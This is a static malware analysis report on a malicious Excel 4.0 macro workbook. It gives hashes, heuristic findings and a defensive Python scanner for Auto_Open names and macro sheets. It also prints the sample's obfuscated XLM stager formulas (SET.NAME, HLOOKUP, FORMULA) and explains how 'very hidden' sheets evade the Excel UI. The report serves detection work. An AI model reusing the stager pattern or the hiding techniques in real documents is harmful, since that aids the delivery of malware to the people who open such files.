Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7926360c5f510f82…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 36.0 KB
Created: 2020-11-25 10:42:52
Authoring application: Microsoft Excel
First seen: 2021-02-23
MD5: 9c0dddc4dfa4f27b936b6b09ecf65172
SHA-1: b64c425c5385bf9d5030d45091977efd39240906
SHA-256: 7926360c5f510f8258370695818d93a00ef279b8490e65debf704b508a698084
Risk score: 140

Heuristics (3)

  • Excel 4.0 Auto_Open defined name [critical] OLE_XLM_AUTOOPEN_DEFINEDNAME
    oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. In BIFF the auto-execution names are stored as built-in names, a one-byte index inside a NAME record (index 1 = Auto_Open, 2 = Auto_Close) rather than the literal string, so a plain byte-string search for "Auto_Open" can miss them. The record the listing prints as "built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!C181" is that NAME record, with a 7-byte 3-D cell reference as its definition, and the recovered macro listing confirms that the workbook has an XLM auto-execution entry.
  • XLM Auto_Open with dangerous formula APIs [critical] OLE_XLM_DANGEROUS_FN
    The Excel 4.0 macro sheet combines the Auto_Open / Auto_Close entry with XLM formula APIs that can invoke programs, write files, or transfer control without any VBA. In this sample the visible formulas are SET.NAME assignments, HLOOKUP lookups over named ranges, and a FORMULA() call (C167) that writes a string assembled from those lookups into a cell as a live formula, next to NEXT() loop terminators; this is the usual shape of an XLM stager that decodes its real commands from data cells at run time. No EXEC or CALL appears in the static listing, so the final stage has to be recovered by emulating the macro rather than read off this dump.
  • Excel 4.0 (XLM) macro sheet present [medium] OLE_XLM_AUTOOPEN
    The workbook contains an Excel 4.0 macro sheet sub-stream (a BOUNDSHEET record of sheet type 0x01, here named KtAjdrtNEE). XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
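As an added example (not part of this report and not oletools code), the following Python scans a BIFF8 Workbook stream for the two structures the first and third heuristics key on: BOUNDSHEET records whose sheet-type byte is 0x01 (Excel 4.0 macro sheet) and NAME records with the fBuiltin flag set and built-in index 1 (Auto_Open) or 2 (Auto_Close). It runs on a constructed in-memory stream built by the helper functions at the bottom, not on bytes from the analysed file; the macro sheet is deliberately marked "very hidden" there to exercise the visibility decode (the report's sample has it visible). A real file needs the Workbook stream pulled out of the OLE container first (for example with olefile), and records split across CONTINUE records or sitting behind a FILEPASS encryption record are not handled here.

```python
import struct

# BIFF8 record ids (MS-XLS)
REC_BOF, REC_EOF = 0x0809, 0x000A
REC_BOUNDSHEET, REC_NAME = 0x0085, 0x0018

SHEET_TYPES = {0x00: "worksheet/dialog", 0x01: "Excel 4.0 macro sheet",
               0x02: "chart", 0x06: "VBA module"}
SHEET_STATES = {0: "visible", 1: "hidden", 2: "very hidden"}
# Built-in defined-name indices; the auto-execution ones are what matter here.
BUILTIN_NAMES = {0x01: "Auto_Open", 0x02: "Auto_Close",
                 0x0A: "Auto_Activate", 0x0B: "Auto_Deactivate"}
AUTOEXEC_NAMES = set(BUILTIN_NAMES.values())


def iter_records(stream: bytes):
    """Yield (record id, payload) for every record in a BIFF stream."""
    off = 0
    while off + 4 <= len(stream):
        rec_id, rec_len = struct.unpack_from("<HH", stream, off)
        payload = stream[off + 4: off + 4 + rec_len]
        if len(payload) < rec_len:      # truncated tail: stop rather than mis-parse
            break
        yield rec_id, payload
        off += 4 + rec_len


def _xl_string(data: bytes, off: int, cch: int) -> str:
    """XLUnicodeStringNoCch: flags byte (bit 0 = UTF-16) followed by cch characters."""
    if data[off] & 1:
        return data[off + 1: off + 1 + 2 * cch].decode("utf-16-le")
    return data[off + 1: off + 1 + cch].decode("latin-1")


def parse_boundsheet(payload: bytes) -> dict:
    """BOUNDSHEET: lbPlyPos(4) grbit(2) cch(1) name. grbit low 2 bits = visibility,
    high byte = sheet type (0x01 is an Excel 4.0 macro sheet)."""
    ply_pos, grbit = struct.unpack_from("<IH", payload, 0)
    return {"name": _xl_string(payload, 7, payload[6]),
            "type": SHEET_TYPES.get(grbit >> 8, "unknown(0x%02x)" % (grbit >> 8)),
            "state": SHEET_STATES.get(grbit & 3, "unknown"),
            "offset": ply_pos}


def parse_name(payload: bytes) -> dict:
    """NAME (Lbl): grbit(2) chKey(1) cch(1) cce(2) reserved(2) itab(2) and four
    reserved length bytes, then the name string, then cce bytes of formula (rgce)."""
    grbit, _chkey, cch, cce = struct.unpack_from("<HBBH", payload, 0)
    builtin = bool(grbit & 0x0020)      # fBuiltin
    if builtin:                         # built-in names are a one-byte index, not text
        idx = payload[15]
        name = BUILTIN_NAMES.get(idx, "builtin_0x%02x" % idx)
    else:
        name = _xl_string(payload, 14, cch)
    return {"name": name, "builtin": builtin,
            "hidden": bool(grbit & 0x0001), "formula_len": cce}


def scan_workbook(stream: bytes) -> list:
    """Return findings labelled with the report's heuristic ids."""
    findings = []
    for rec_id, payload in iter_records(stream):
        if rec_id == REC_BOUNDSHEET:
            sheet = parse_boundsheet(payload)
            if sheet["type"] == "Excel 4.0 macro sheet":
                findings.append("OLE_XLM_AUTOOPEN: XLM macro sheet '%s' (%s)"
                                % (sheet["name"], sheet["state"]))
        elif rec_id == REC_NAME:
            name = parse_name(payload)
            if name["builtin"] and name["name"] in AUTOEXEC_NAMES:
                findings.append("OLE_XLM_AUTOOPEN_DEFINEDNAME: built-in name %s%s"
                                % (name["name"], " (hidden)" if name["hidden"] else ""))
    return findings


# --- constructed sample stream (not bytes from the analysed file) -------------
def _rec(rec_id: int, payload: bytes) -> bytes:
    return struct.pack("<HH", rec_id, len(payload)) + payload


def _boundsheet(name: str, sheet_type: int, state: int) -> bytes:
    raw = name.encode("latin-1")
    return _rec(REC_BOUNDSHEET, struct.pack("<IH", 0, (sheet_type << 8) | state)
                + bytes([len(raw), 0]) + raw)


def _builtin_name(idx: int, rgce: bytes, grbit: int = 0x0020) -> bytes:
    header = struct.pack("<HBBHHH", grbit, 0, 1, len(rgce), 0, 0) + b"\x00" * 4
    return _rec(REC_NAME, header + b"\x00" + bytes([idx]) + rgce)


# ptgRef3d (0x3A): ixti=1, row 180 (0-based, i.e. row 181), column 2 (C): Sheet!C181
AUTO_OPEN_RGCE = bytes([0x3A]) + struct.pack("<HHH", 1, 180, 2)

SAMPLE_WORKBOOK = (
    _rec(REC_BOF, struct.pack("<HHHHII", 0x0600, 0x0005, 0, 0, 0, 0))
    + _boundsheet("Sheet", 0x00, 0)          # ordinary visible worksheet
    + _boundsheet("KtAjdrtNEE", 0x01, 2)     # macro sheet, made "very hidden" here
    + _builtin_name(0x01, AUTO_OPEN_RGCE)    # built-in name 1 = Auto_Open, 7-byte rgce
    + _rec(REC_EOF, b"")
)

if __name__ == "__main__":
    for line in scan_workbook(SAMPLE_WORKBOOK):
        print(line)
```

The visibility decode matters in practice: a macro sheet with state 2 ("very hidden") cannot be unhidden from the Excel UI, and a NAME record with fHidden set does not show up in the Name Manager, so both are worth surfacing alongside the type check.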

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: xlm_macros.txt
Kind: xlm-macro
Source: oletools.olevba.extract_all_macros (XLM macro listing)
Size: 6619 bytes
SHA-256: 516b9dff9eae343d9d574dcfe54543b512d1d42cd1eb5d21621159f60643b3b6
Preview of the extracted script (first 1,000 lines shown)
' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     19 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  KtAjdrtNEE
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!C181 
' 0018     27 LABEL : Cell Value, String Constant - BPHqEtmQsyDG len=0 
' 0018     25 LABEL : Cell Value, String Constant - cqiXrBisAp len=0 
' 0018     25 LABEL : Cell Value, String Constant - dTLjeFxjVV len=0 
' 0018     25 LABEL : Cell Value, String Constant - dXAgZDsgJh len=0 
' 0018     20 LABEL : Cell Value, String Constant - eStmg len=0 
' 0018     26 LABEL : Cell Value, String Constant - gHcadghTBrn len=0 
' 0018     21 LABEL : Cell Value, String Constant - gjvxUz len=0 
' 0018     24 LABEL : Cell Value, String Constant - ioFRLEZUk len=0 
' 0018     25 LABEL : Cell Value, String Constant - itMoevihyw len=0 
' 0018     26 LABEL : Cell Value, String Constant - klrttFnfHQS len=0 
' 0018     25 LABEL : Cell Value, String Constant - nZMGusOinP len=0 
' 0018     20 LABEL : Cell Value, String Constant - plrPw len=0 
' 0018     27 LABEL : Cell Value, String Constant - pyhqVYCITHBb len=0 
' 0018     26 LABEL : Cell Value, String Constant - SfWYzPlWQov len=0 
' 0018     20 LABEL : Cell Value, String Constant - SYEmC len=0 
' 0018     24 LABEL : Cell Value, String Constant - TcOQsBYPf len=0 
' 0018     21 LABEL : Cell Value, String Constant - TWoRXo len=0 
' 0018     22 LABEL : Cell Value, String Constant - XLTOBLT len=0 
' 0018     21 LABEL : Cell Value, String Constant - zHARRb len=0 
' 0018     20 LABEL : Cell Value, String Constant - ZlUVY len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  KtAjdrtNEE,C85,"SET.NAME("TcOQsBYPf",VALUE("0"))",""
'  KtAjdrtNEE,C90,"SET.NAME("SfWYzPlWQov",TcOQsBYPf)",""
'  KtAjdrtNEE,C95,"SET.NAME("TWoRXo",TcOQsBYPf)",""
'  KtAjdrtNEE,C100,"SET.NAME("ioFRLEZUk",COUNTA(klrttFnfHQS))",""
'  KtAjdrtNEE,C105,"SET.NAME("nZMGusOinP",COUNTA(BPHqEtmQsyDG))",""
'  KtAjdrtNEE,C109,[],""
'  KtAjdrtNEE,C111,"SET.NAME("ZlUVY","")",""
'  KtAjdrtNEE,C115,"SfWYzPlWQov",""
'  KtAjdrtNEE,C117,"SET.NAME("pyhqVYCITHBb",HLOOKUP("*",klrttFnfHQS,SfWYzPlWQov,FALSE))",""
'  KtAjdrtNEE,C120,"gjvxUz",""
'  KtAjdrtNEE,C125,"SET.NAME("dTLjeFxjVV",TcOQsBYPf)",""
'  KtAjdrtNEE,C130,[],""
'  KtAjdrtNEE,C135,"dTLjeFxjVV",""
'  KtAjdrtNEE,C139,"gHcadghTBrn",""
'  KtAjdrtNEE,C141,"dXAgZDsgJh",""
'  KtAjdrtNEE,C145,"zHARRb",""
'  KtAjdrtNEE,C147,"SET.NAME("SYEmC",VALUE(HLOOKUP("*",BPHqEtmQsyDG,zHARRb,FALSE)))",""
'  KtAjdrtNEE,C152,"cqiXrBisAp",""
'  KtAjdrtNEE,C156,"ZlUVY",""
'  KtAjdrtNEE,C159,"TWoRXo",""
'  KtAjdrtNEE,C163,NEXT(),""
'  KtAjdrtNEE,C165,"itMoevihyw",""
'  KtAjdrtNEE,C167,"SET.NAME("f",INT(T(FORMULA(T(ZlUVY)&"",""&T(itMoevihyw)))))",""
'  KtAjdrtNEE,C171,"eStmg",""
'  KtAjdrtNEE,C175,NEXT(),""
'  KtAjdrtNEE,C177,RETURN(),""
'  KtAjdrtNEE,C204,"SET.NAME("plrPw",C85)",""
'  KtAjdrtNEE,C208,"klrttFnfHQS",""
'  KtAjdrtNEE,C212,"SET.NAME("BPHqEtmQsyDG",R58C15)",""
'  KtAjdrtNEE,C214,"SET.NAME("eStmg",219)",""
'  KtAjdrtNEE,C216,"SET.NAME("XLTOBLT",3)",""
'  KtAjdrtNEE,C218,plrPw(),""
'  KtAjdrtNEE,C219,HALT(),""